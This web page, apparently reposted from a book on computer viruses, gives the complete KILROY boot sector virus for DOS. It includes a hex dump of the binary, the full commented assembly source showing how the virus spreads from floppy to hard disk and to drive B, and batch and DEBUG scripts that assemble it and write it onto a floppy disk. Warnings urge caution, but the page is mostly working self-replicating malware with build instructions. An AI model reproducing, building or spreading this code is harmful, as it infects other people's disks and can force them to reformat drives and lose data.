WARNING: If you attempt to create a disk infected with the KILROY virus, MARK IT CAREFULLY, and DO NOT BOOT
WITH IT, unless you are absolutely sure of what you are doing! If you are not careful you could cause a run-away infection!! Remember that any disk infected with this virus will display the message “Kilroy was here” when it boots, so watch out for that message if you have ever allowed the KILROY virus to execute on your system! PROCEED AT YOUR OWN RISK!
The HEX listing of the Kilroy virus is as follows:
:10000000EB28904B494C524F59202000020201002E
:10001000027000D002FD0200090002000000000092
:1000200000001200000000010000FA33C08EC08EF4
:10003000D0BC007CBB780036C5371E561653BF1E99
:100040007CB90B00FCAC26803D007503AAEB014790
:10005000E2F38AC48ED8894702C7071E7CFBCD1302
:1000600072FEE83E01BB0005803EFD7D80742EBA25
:100070008001803E7504007424B90100B80102CDEE
:1000800013721A813EFE0655AA7512E8FE00BA8068
:1000900001B90100B80103CD137202EB32A01004C4
:1000A00024C0D0C0D0C0FEC03C027223BA0100B848
:1000B0000102B90100CD137216813EFE0655AA75E4
:1000C0000EE8C800BA0100B80103B90100CD13A0C1
:1000D000107C32E4F726167C03061C7C03060E7C9B
:1000E00050A3037CB82000F726117C8B1E0B7C03E9
:1000F000C348F7F30106037CBB000558E85D00B078
:1001000001E86F008BFBB90B00BEB27DF3A6740C47
:100110008BFBB90B00BEBD7DF3A675FEA11C05339C
:10012000D2F7360B7CFEC08BE8A1037C50BB0007E6
:10013000A1037CE82600B001E8380083ED01740BD0
:100140008306037C01031E0B7CEBE58A2E157C8A5B
:1001500016FD7D5BB870005033C050CB33D2F736FC
:10016000187CFEC28AEA33D2F7361A7C8816297CBC
:100170008BD0C3B402B106D2E60AF58BCA86E98AEF
:1001800016FD7D8A36297CCD1372FEC3BE1E7CBF50
:100190001E05B9DF01F3A4BE007CBF0005B90B004A
:1001A000F3A4C3BEC87DB40EAC0AC07404CD10EB7A
:1001B000F5C349424D42494F2020434F4D494F20FE
:1001C00020202020205359534B696C726F7920777F
:1001D00061732068657265210D0A0A000000000045
:1001E000000000000000000000000000000000000F
:1001F000000000000000000000000000000055AA00
:00000001FF
To load it onto a floppy disk, put a disk in drive A and format it using the /s option to put DOS on the disk. Create the HEX file KILROY.HEX from the above listing, and load it using LOAD.BAS in Appendix F. Then create a batch file KILROY_H.BAT that looks like this:
debug kilroy.com <kilroy_h.dbg and a file KILROY_H.DBG that looks like this:
r cx 200 w 100 0 0 1 q
and execute KILROY_H with the newly formatted floppy disk in drive A. The boot sector virus will be put on drive A. If you boot from that disk even once, your hard disk will be promptly infected, and you will have to reformat it to get rid of the virus, unless you use the tools in Appendix G. DO NOT DO IT UNLESS YOU ARE SURE YOU KNOW WHAT YOU ARE DOING.
The assembly language source listing for the Kilroy virus (KILROY.ASM), in its entirety, is as follows:
;The KILROY one-sector boot sector virus will both boot up either MS-DOS or ;PC-DOS and it will infect other disks.
;This segment is where the first operating system file (IBMBIO.COM or IO.SYS)
;will be loaded and executed from. We don’t know (or care) what is there, but
;we do need the address to jump to defined in a separate segment so we can ;execute a far jump to it.
DOS_LOAD SEGMENT AT 0070H
ASSUME CS:DOS_LOAD
ORG 0
LOAD: DB 0 ;Start of the first operating system program DOS_LOAD ENDS
MAIN SEGMENT BYTE
ASSUME CS:MAIN,DS:MAIN,SS:NOTHING
;This jump instruction is just here so we can compile this program as a COM
;file. It is never actually executed, and never becomes a part of the boot
;sector. Only the 512 bytes after the address 7C00 in this file become part of ;the boot sector.
ORG 100H
START: jmp BOOTSEC
;The following two definitions are BIOS RAM bytes which contain information
;about the number and type of disk drives in the computer. These are needed by
;the virus to decide on where to look to find drives to infect. They are not ;normally needed by an ordinary boot sector.
ORG 0410H
SYSTEM_INFO: DB ? ;System info byte: Take bits 6 & 7 and add 1 to
;get number of disk drives on this system
;(eg 01 = 2 drives)
ORG 0475H
HD_COUNT: DB ? ;Number of hard drives in the system
;This area is reserved for loading the boot sector from the disk which is going
;to be infected, as well as the first sector of the root directory, when ;checking for the existence of system files and loading the first system file.
ORG 0500H DISK_BUF: DW ? ;Start of the buffer
ORG 06FEH
NEW_ID: DW ? ;Location of AA55H in boot sector loaded at
DISK_BUF
;Here is the start of the boot sector code. This is the chunk we will take out ;of the compiled COM file and put it in the first sector on a 360K floppy disk.
;Note that this MUST be loaded onto a 360K floppy to work, because the
;parameters in the data area that follow are set up to work only with a 360K ;disk!
ORG 7C00H BOOTSEC: JMP BOOT ;Jump to start of boot sector code
ORG 7C03H ;Start of data area
DOS_ID: DB ’KILROY ’ ;Name of this boot sector (8 bytes)
SEC_SIZE: DW 200H ;Size of a sector, in bytes
SECS_PER_CLUST: DB 02 ;Number of sectors in a cluster
FAT_START: DW 1 ;Starting sector for the first FAT
FAT_COUNT: DB 2 ;Number of FATs on this disk
ROOT_ENTRIES: DW 70H ;Number of root directory entries
SEC_COUNT: DW 2D0H ;Total number of sectors on this disk
DISK_ID: DB 0FDH ;Disk type code (This is 360KB)
SECS_PER_FAT: DW 2 ;Number of sectors per FAT
SECS_PER_TRK: DW 9 ;Sectors per track for this drive
HEADS: DW 2 ;Number of heads (sides) on this drive HIDDEN_SECS: DW 0 ;Number of hidden sectors on the disk
DSKBASETBL:
DB 0 ;Specify byte 1: step rate time, hd unload time DB 0 ;Specify byte 2: Head load time, DMA mode
DB 0 ;Wait time until motor turned off, in ticks
DB 0 ;Bytes per sector (0=128, 1=256, 2=512, 3=1024)
DB 12H ;Last sector number (lg enough to handle 1.44M)
DB 0 ;Gap length between sectors for r/w operations
DB 0 ;Data xfer lgth when sector lgth not specified
DB 0 ;Gap length between sectors for formatting
DB 0 ;Value stored in newly formatted sectors
DB 1 ;Head settle time, in milliseconds
DB 0 ;Motor startup time, in 1/8 seconds HEAD: DB 0 ;Current head to read from
;Here is the start of the boot sector code
BOOT: CLI ;interrupts off
XOR AX,AX ;prepare to set up segments
MOV ES,AX ;set ES=0
MOV SS,AX ;start stack at 0000:7C00
MOV SP,OFFSET BOOTSEC
MOV BX,1EH*4 ;get address of disk
LDS SI,SS:[BX] ;param table in ds:si
PUSH DS
PUSH SI ;save that address
PUSH SS
PUSH BX ;and its address
MOV DI,OFFSET DSKBASETBL ;and update default
MOV CX,11 ;values to table values here
CLD ;direction flag cleared
DFLT1: LODSB
CMP BYTE PTR ES:[DI],0 ;anything non-zero
JNZ SHORT DFLT2 ;not default, so don’t save it
STOSB ;else use default value
JMP SHORT DFLT3 ;and go on to next
DFLT2: INC DI
DFLT3: LOOP DFLT1 ;and loop until cx=0
MOV AL,AH ;set ax=0
MOV DS,AX ;set ds=0 to set disk tbl
MOV WORD PTR [BX+2],AX ;to @DSKBASETBL (ax=0 here)
MOV WORD PTR [BX],OFFSET DSKBASETBL ;ok, done
STI ;now turn interrupts on
INT 13H ;and reset disk drive system
ERROR1: JC ERROR1 ;if an error, hang the machine
;Attempt to self reproduce. If this boot sector is located on drive A, it will
;attempt to relocate to drive C. If successful, it will stop, otherwise it will
;attempt to relocate to drive B. If this boot sector is located on drive C, it ;will attempt to relocate to drive B. SPREAD:
CALL DISP_MSG ;Display the “Kilroy” message
MOV BX,OFFSET DISK_BUF ;put other boot sectors here
CMP BYTE PTR [DRIVE],80H
JZ SPREAD2 ;if C, go try to spread to B
MOV DX,180H ;if A, try to spread to C first
CMP BYTE PTR [HD_COUNT],0 ;see if there is a hard drive
JZ SPREAD2 ;none - try floppy B
MOV CX,1 ;read Track 0, Sector 1
MOV AX,201H
INT 13H
JC SPREAD2 ;on error, go try drive B
CMP WORD PTR [NEW_ID],0AA55H;make sure it’s a boot sector
JNZ SPREAD2
CALL MOVE_DATA
MOV DX,180H ;and go write the new sector
MOV CX,1
MOV AX,301H
INT 13H JC SPREAD2 ;if error on c:, try b:
JMP SHORT LOOK_SYS ;ok, go look for system files SPREAD2: MOV AL,BYTE PTR [SYSTEM_INFO] ;first see if there is a B:
AND AL,0C0H
ROL AL,1 ;put bits 6 & 7 into bits 0 & 1
ROL AL,1
INC AL ;add one, so now AL=# of drives
CMP AL,2
JC LOOK_SYS ;no B drive, just quit
MOV DX,1 ;read drive B
MOV AX,201H ;read one sector
MOV CX,1 ;read Track 0, Sector 1
INT 13H
JC LOOK_SYS ;if an error here, just exit
CMP WORD PTR [NEW_ID],0AA55H;make sure it’s a boot sector
JNZ LOOK_SYS ;no, don’t attempt reproduction
CALL MOVE_DATA ;yes, move boot sector to write
MOV DX,1 MOV AX,301H ;and write this boot sec to B:
MOV CX,1
INT 13H
;Here we look at the first file on the disk to see if it is the first MS-DOS or ;PC-DOS system file, IO.SYS or IBMBIO.COM, respectively.
LOOK_SYS:
MOV AL,BYTE PTR [FAT_COUNT] ;get fats per disk
XOR AH,AH
MUL WORD PTR [SECS_PER_FAT] ;multiply by sectors per fat
ADD AX,WORD PTR [HIDDEN_SECS] ;add hidden sectors
ADD AX,WORD PTR [FAT_START] ;add starting fat sector
PUSH AX
MOV WORD PTR [DOS_ID],AX ;root dir, save it
MOV AX,20H ;dir entry size
MUL WORD PTR [ROOT_ENTRIES] ;dir size in ax
MOV BX,WORD PTR [SEC_SIZE] ;sector size
ADD AX,BX ;add one sector
DEC AX ;decrement by 1
DIV BX ;ax=# sectors in root dir
ADD WORD PTR [DOS_ID],AX ;DOS_ID=start of data
MOV BX,OFFSET DISK_BUF ;set disk buffer to 0000:0500
POP AX
CALL CONVERT ;and go convert sec # for bios
MOV AL,1 ;prepare for a 1 sector read
CALL READ_DISK ;go read it
MOV DI,BX ;compare first file on disk
MOV CX,11 ;with required file name of
MOV SI,OFFSET SYSFILE_1 ;first system file for PC DOS
REPZ CMPSB
JZ SYSTEM_THERE ;ok, found it, go load it
MOV DI,BX ;compare first file with
MOV CX,11 ;required file name of
MOV SI,OFFSET SYSFILE_2 ;first system file for MS DOS
REPZ CMPSB
ERROR2: JNZ ERROR2 ;not the same - an error,
;so hang the machine
;Ok, system file is there, so load it SYSTEM_THERE:
MOV AX,WORD PTR [DISK_BUF+1CH] ;get file size
XOR DX,DX ;of IBMBIO.COM/IO.SYS
DIV WORD PTR [SEC_SIZE] ;and divide by sector size
INC AL ;ax=number of sectors to read
MOV BP,AX ;store that number in BP MOV AX,WORD PTR [DOS_ID] ;get sec # of start of data
PUSH AX
MOV BX,700H ;set disk buffer to 0000:0700
RD_BOOT1: MOV AX,WORD PTR [DOS_ID] ;and get sector to read
CALL CONVERT ;convert to bios Trk/Cyl/Sec
MOV AL,1 ;read one sector
CALL READ_DISK ;go read the disk
SUB BP,1 ;- 1 from # of secs to read
JZ DO_BOOT ;and quit if we’re done
ADD WORD PTR [DOS_ID],1 ;add secs read to sec to read
ADD BX,WORD PTR [SEC_SIZE] ;and update buffer address
JMP RD_BOOT1 ;then go for another
;Ok, the first system file has been read in, now transfer control to it DO_BOOT:
MOV CH,BYTE PTR [DISK_ID] ;Put drive type in ch
MOV DL,BYTE PTR [DRIVE] ;Drive number in dl
POP BX
; JMP FAR PTR LOAD ;use far jump with MASM or TASM
MOV AX,0070H ;A86 can’t handle that,
PUSH AX ;so let’s fool it with far ret
XOR AX,AX
PUSH AX
RETF
;Convert sequential sector number in ax to BIOS Track, Head, Sector
;information. Save track number in DX, sector number in CH, CONVERT:
XOR DX,DX
DIV WORD PTR [SECS_PER_TRK] ;divide ax by sectors per track
INC DL ;dl=sector # to start read on,
MOV CH,DL ;al=track/head count
XOR DX,DX
DIV WORD PTR [HEADS] ;divide ax by head count
MOV BYTE PTR [HEAD],DL ;dl=head number, save it
MOV DX,AX ;ax=track number, save it in dx
RET
;Read the disk for the number of sectors in al, into the buffer es:bx, using
;the track number in DX, the head number at HEAD, and the sector ;number at CH.
READ_DISK:
MOV AH,2 ;read disk command
MOV CL,6 ;shift upper 2 bits of trk # to
SHL DH,CL ;the high bits in dh and put
OR DH,CH ;sector # in the low 6 bits
MOV CX,DX
XCHG CH,CL ;ch(0-5)=sec, cl/ch(6-7)=track
MOV DL,BYTE PTR [DRIVE] ;get drive number from here
MOV DH,BYTE PTR [HEAD] ;and head number from here
INT 13H ;go read the disk
ERROR3: JC ERROR3 ;hang in case of an error
RET
;Move data that doesn’t change from this boot sector to the one read in at
;DISK_BUF. That includes everything but the DRIVE ID (at offset 7DFDH) and ;the data area at the beginning of the boot sector.
MOVE_DATA:
MOV SI,OFFSET DSKBASETBL ;Move the boot sector code MOV DI,OFFSET DISK_BUF + (OFFSET DSKBASETBL - OFFSET BOOT-
SEC)
MOV CX,OFFSET DRIVE - OFFSET DSKBASETBL
REP MOVSB
MOV SI,OFFSET BOOTSEC ;Move init jmp and sector ID
MOV DI,OFFSET DISK_BUF
MOV CX,11
REP MOVSB
RET
;Display the null terminated string at MESSAGE.
DISP_MSG:
MOV SI,OFFSET MESSAGE ;set offset of message up
DM1: MOV AH,0EH ;Execute BIOS INT 10H, Fctn 0EH
LODSB ;get character to display
OR AL,AL
JZ DM2 ;repeat until 0
INT 10H ;display it
JMP SHORT DM1 ;and get another
DM2: RET
SYSFILE_1: DB ’IBMBIO COM’ ;PC DOS System file
SYSFILE_2: DB ’IO SYS’ ;MS DOS System file
MESSAGE: DB ’Kilroy was here!’,0DH,0AH,0AH,0
ORG 7DFDH
DRIVE: DB 0 ;Disk drive for this sector BOOT_ID: DW 0AA55H ;Boot sector ID word
MAIN ENDS
END START
To assemble this, you will need to create the file KILROY.DBG, as follows:
r cx 200 w 7C00 0 0 1 q
If you want to use the Microsoft Assembler, create the batch file KILROY_M.BAT as follows:
masm kilroy; link kilroy; exe2bin kilroy kilroy.com debug kilroy.com <kilroy.dbg del kilroy.obj del kilroy.exe del kilroy.com
and execute it with a freshly formatted disk (using the /s option) in drive A. If you want to use the Turbo Assembler, create KILROY_T.BAT:
tasm kilroy; link kilroy; exe2bin kilroy kilroy.com debug kilroy.com <kilroy.dbg del kilroy.obj
del kilroy.map del kilroy.exe del kilroy.com
and do the same. If you are using A86, then the batch file KIL-
ROY_A.BAT,
a86 kilroy.asm kilroy.com debug kilroy.com <kilroy.dbg del kilroy.com
will do the job, but remember, DO NOT ATTEMPT TO CREATE THIS VIRUS UNLESS YOU KNOW WHAT YOU ARE DOING.
PROCEED AT YOUR OWN RISK!!
About The Author
Post a Comment
Write Your Precious Comments Here.!